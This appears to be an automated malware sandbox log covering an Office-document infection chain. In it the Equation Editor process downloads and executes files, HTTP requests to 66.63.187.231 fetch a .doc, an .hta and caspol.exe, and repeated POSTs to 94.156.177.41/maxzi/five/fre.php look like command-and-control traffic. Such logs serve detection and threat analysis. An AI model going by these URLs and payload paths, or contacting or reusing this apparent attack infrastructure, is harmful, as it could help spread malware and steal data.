Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close

Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49164 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.231

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 8_2_035F0499 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

8_2_035F0499

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BBEEDD3-2D62-441C-8A36-2FA05C364E08}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /Ib9yLe?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulture HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: provit.ukConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 66.63.187.231Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.231Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /33/caspol.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.231Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: provit.uk

Source: unknown

HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 144Content-Security-Policy: default-src 'none'Content-Type: text/html; charset=utf-8Date: Wed, 20 Nov 2024 09:11:10 GMTStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-Dns-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 144Content-Security-Policy: default-src 'none'Content-Type: text/html; charset=utf-8Date: Wed, 20 Nov 2024 09:11:11 GMTStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-Dns-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
